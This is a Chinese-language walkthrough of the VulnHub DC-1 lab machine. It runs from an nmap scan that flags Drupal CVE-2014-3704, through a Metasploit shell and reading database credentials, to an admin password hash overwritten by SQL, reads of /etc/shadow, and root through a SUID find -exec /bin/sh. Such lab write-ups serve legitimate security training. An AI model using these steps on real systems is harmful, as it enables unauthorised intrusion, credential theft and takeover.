下载地址https://download.vulnhub.com/dc/DC-1.zip
代码语言:javascript复制map -A -T4 10.10.10.132 --script=vulnNmap scan report for 10.10.10.132
Host is up (0.00034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 deb7u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.132
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.132:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.132:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://10.10.10.132:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.132:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://10.10.10.132:80/user
| Form id: user-login
| Form action: /user
|
| Path: http://10.10.10.132:80/user/
| Form id: user-login
|_ Form action: /user/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
| http://www.securityfocus.com/bid/70595
| https://www.drupal.org/SA-CORE-2014-005
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36912/udp status
| 100024 1 37215/tcp6 status
| 100024 1 52947/udp6 status
|_ 100024 1 54937/tcp status
MAC Address: 00:0C:29:3D:43:A8 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms 10.10.10.132
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 530.45 seconds
通过返回结果看到存在CVE2014-3704
seachsploit搜索 -m参数可以把exp保存到当前位置
接着在msf上搜
漏洞利用getshell
切换shell
cat flag1.txt
Every good CMS needs a config file - and so do you.发现flag1
寻找drupal配置文件
drupal数据库配置文件默认在
/sites/default/settings.php
发现flag2
代码语言:javascript复制cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);使用python获取交互shell查看当前权限
代码语言:javascript复制python -c '__import__("pty").spawn("/bin/bash")'
可以看到是www权限
通过查看数据库
发现密码hash加盐,破解难度比较大,可以通过更新密码,或者利用其他方法
利用
代码语言:javascript复制update users set pass=‘$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4’ where name=‘admin';update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';然后用password登陆
之前通过seachsploit发现有个可以添加一个管理权限的脚本
把此脚本复制到当前目录下
也可以登录到管理员
可直接添加有admin权限的账户
拿到第3个flag
查看提示
代码语言:javascript复制whoami
uname -a
cat /etc/passwd
cat /etc/shadow
发现flag4在home目录下
他让你使用root访问
接下来提权
通过flag3获取到提示的使用find -exec
搜索suid权限的程序
代码语言:javascript复制find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm -u=s 2>/dev/null发现使用find有root权限
然后用find … - exec “…” 查找文件后并执行命令
代码语言:javascript复制find ./ -exec "whoami" ;
find ./ -exec "/bin/sh" ;成功提到root权限
